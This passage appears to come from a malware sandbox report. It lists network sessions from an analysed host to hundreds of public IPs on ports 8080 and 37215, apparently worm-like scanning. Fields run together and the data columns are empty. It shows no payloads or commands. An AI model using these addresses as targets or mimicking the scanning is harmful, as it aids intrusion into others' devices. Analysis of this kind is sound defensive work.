                                                        14676192.168.2.234656852.13.196.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14677192.168.2.236015670.173.230.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14678192.168.2.2336810138.133.32.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14679192.168.2.2344910130.53.72.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14680192.168.2.2341776194.106.194.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14681192.168.2.2346322193.230.39.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14682192.168.2.2346946188.15.66.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14683192.168.2.2341168140.241.196.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14684192.168.2.2351618195.217.171.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14685192.168.2.234572412.248.252.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14686192.168.2.233529895.65.235.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14687192.168.2.235741297.78.116.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14688192.168.2.23555545.42.206.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14689192.168.2.2347828209.231.136.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14690192.168.2.2344878186.152.149.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14691192.168.2.235631212.85.201.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14692192.168.2.234500692.212.181.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14693192.168.2.23335101.54.77.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14694192.168.2.2333216160.15.0.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14695192.168.2.2336892161.236.31.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14696192.168.2.23488564.131.219.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14697192.168.2.2345476133.151.226.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14698192.168.2.234597072.217.105.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14699192.168.2.235669438.203.83.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14700192.168.2.23596464.235.174.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14701192.168.2.234098692.243.66.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14702192.168.2.2352896166.193.95.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14703192.168.2.2336358212.193.157.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14704192.168.2.2338422135.49.160.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14705192.168.2.2350484167.182.56.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14706192.168.2.234005451.178.97.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14707192.168.2.2344794198.146.232.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14708192.168.2.2358796141.131.239.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14709192.168.2.2353140156.0.121.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14710192.168.2.2343402112.101.124.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14711192.168.2.2336758143.26.152.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14712192.168.2.235854252.193.241.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14713192.168.2.234716465.103.222.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14714192.168.2.233778824.34.52.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14715192.168.2.2349198126.78.142.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14716192.168.2.2333320106.134.17.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14717192.168.2.2353624134.198.82.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14718192.168.2.2335462147.181.65.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14719192.168.2.233425467.109.252.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14720192.168.2.233489267.15.214.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14721192.168.2.2357564208.143.183.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14722192.168.2.235882074.183.211.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14723192.168.2.234591664.0.80.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14724192.168.2.233691841.116.173.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14725192.168.2.2341232162.233.126.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14726192.168.2.2345302140.209.114.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14727192.168.2.2338004212.68.109.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14728192.168.2.235430836.236.125.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14729192.168.2.2350120202.67.166.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14730192.168.2.2335404178.138.98.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14731192.168.2.2354256114.20.140.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14732192.168.2.2333964129.212.51.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14733192.168.2.2357362179.111.134.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14734192.168.2.234052097.27.17.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14735192.168.2.2341904126.158.24.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14736192.168.2.2349036145.153.52.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14737192.168.2.234415670.166.87.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14738192.168.2.2343302142.175.9.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14739192.168.2.233441283.250.119.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14740192.168.2.2347652177.52.150.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14741192.168.2.2357458171.112.216.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14742192.168.2.23477809.242.39.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14743192.168.2.2338602150.196.21.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14744192.168.2.236008665.147.168.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14745192.168.2.233987065.208.217.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14746192.168.2.233469682.165.53.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14747192.168.2.2350128206.86.98.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14748192.168.2.2338706207.164.254.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14749192.168.2.23343184.167.56.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14750192.168.2.2359616167.185.83.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14751192.168.2.2348206208.215.180.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14752192.168.2.235117099.168.151.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14753192.168.2.2341558121.132.144.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14754192.168.2.2342806153.41.130.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14755192.168.2.235415819.171.193.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14756192.168.2.235295642.78.5.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14757192.168.2.235205037.34.48.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14758192.168.2.2359768172.140.26.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14759192.168.2.2359220131.34.111.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14760192.168.2.235033691.11.197.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14761192.168.2.234643298.236.250.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14762192.168.2.2347512201.76.134.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14763192.168.2.2338376174.163.102.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14764192.168.2.2343540118.184.247.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14765192.168.2.2355178138.194.88.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14766192.168.2.233428464.147.5.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14767192.168.2.2353758106.45.53.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14768192.168.2.235427080.126.204.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14769192.168.2.2355310136.218.206.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14770192.168.2.2339012210.52.39.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14771192.168.2.23381229.198.101.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14772192.168.2.235666076.37.43.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14773192.168.2.2333726217.194.250.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14774192.168.2.2340404204.17.223.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14775192.168.2.2333534152.4.188.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14776192.168.2.234186480.2.36.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14777192.168.2.2335394157.218.196.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14778192.168.2.235052075.175.65.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14779192.168.2.2349048157.8.237.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14780192.168.2.233336241.117.79.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14781192.168.2.2344294197.16.45.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14782192.168.2.2342198197.213.75.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14783192.168.2.233752841.31.127.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14784192.168.2.235555441.131.241.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14785192.168.2.2345292154.134.189.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14786192.168.2.2336648197.53.248.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14787192.168.2.2359256197.230.166.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14788192.168.2.2339458157.104.59.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14789192.168.2.235063441.154.184.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14790192.168.2.2351220197.101.70.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14791192.168.2.2359692157.116.3.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14792192.168.2.2348896157.113.143.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14793192.168.2.2347192124.80.172.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14794192.168.2.2339582197.140.179.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14795192.168.2.2342228157.39.72.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14796192.168.2.233860041.179.85.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14797192.168.2.233826641.201.140.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14798192.168.2.2339744157.176.179.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14799192.168.2.235541442.208.190.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14800192.168.2.2360554157.222.235.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14801192.168.2.235528641.230.25.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14802192.168.2.2338090197.98.222.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14803192.168.2.2353824197.201.6.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14804192.168.2.235826841.249.115.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14805192.168.2.2340700157.76.219.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14806192.168.2.2358194157.48.162.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14807192.168.2.235100241.226.232.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14808192.168.2.233556061.67.220.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14809192.168.2.234295298.111.36.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14810192.168.2.2358470157.178.49.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14811192.168.2.235757241.65.131.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14812192.168.2.236002441.104.51.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14813192.168.2.235994641.170.187.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14814192.168.2.235977241.154.253.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14815192.168.2.235625046.148.179.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14816192.168.2.2359724188.143.157.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14817192.168.2.2354360195.202.95.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14818192.168.2.236028244.0.194.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14819192.168.2.234233841.16.134.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14820192.168.2.2342988197.42.38.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14821192.168.2.2356620157.136.226.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14822192.168.2.235607032.131.228.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14823192.168.2.2356526197.187.242.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14824192.168.2.2355840157.234.19.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14825192.168.2.2342716165.121.226.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14826192.168.2.2347034197.145.175.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14827192.168.2.2348026157.71.78.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14828192.168.2.2337358197.3.179.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14829192.168.2.2357390157.182.24.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14830192.168.2.2346074157.244.241.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14831192.168.2.233843241.212.130.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14832192.168.2.2340946212.117.57.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14833192.168.2.235894641.234.91.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14834192.168.2.2349570202.97.184.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14835192.168.2.233933041.128.106.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14836192.168.2.233358041.82.255.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14837192.168.2.2356490157.82.211.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14838192.168.2.234980494.99.239.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14839192.168.2.2332786197.254.239.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14840192.168.2.235069241.84.126.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14841192.168.2.2356648157.12.130.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14842192.168.2.233297041.159.141.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14843192.168.2.2350238105.88.244.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14844192.168.2.2354674157.107.107.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14845192.168.2.235751646.90.11.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14846192.168.2.235023041.205.193.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14847192.168.2.234754244.5.44.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14848192.168.2.233857035.49.202.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14849192.168.2.2352392197.111.161.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14850192.168.2.236035432.174.13.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14851192.168.2.235825841.191.74.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14852192.168.2.2336564197.164.97.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14853192.168.2.2345854187.158.220.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14854192.168.2.2336974167.232.188.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14855192.168.2.2334664197.188.146.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14856192.168.2.2356758157.52.138.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14857192.168.2.234655641.198.117.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14858192.168.2.2344042105.137.108.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14859192.168.2.2342308197.179.239.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14860192.168.2.233779841.186.219.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14861192.168.2.2345700221.22.14.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14862192.168.2.2336044157.62.62.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14863192.168.2.2334384197.138.12.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14864192.168.2.2332802197.246.110.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14865192.168.2.2355006197.0.153.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14866192.168.2.2346202157.80.228.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14867192.168.2.234419441.33.121.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14868192.168.2.235080636.211.134.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14869192.168.2.234526287.57.153.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14870192.168.2.2356256157.4.65.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14871192.168.2.234153241.206.219.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14872192.168.2.233577841.132.147.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14873192.168.2.234862841.61.136.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14874192.168.2.235026693.202.75.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14875192.168.2.2360718104.249.66.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14876192.168.2.2347006157.211.153.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14877192.168.2.2349430185.109.161.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14878192.168.2.2357152211.228.3.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14879192.168.2.233489441.99.147.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14880192.168.2.2341806157.47.135.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14881192.168.2.235472241.21.51.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14882192.168.2.2348982197.178.184.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14883192.168.2.2339956197.78.34.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14884192.168.2.2338870107.35.220.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14885192.168.2.2333204134.91.21.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
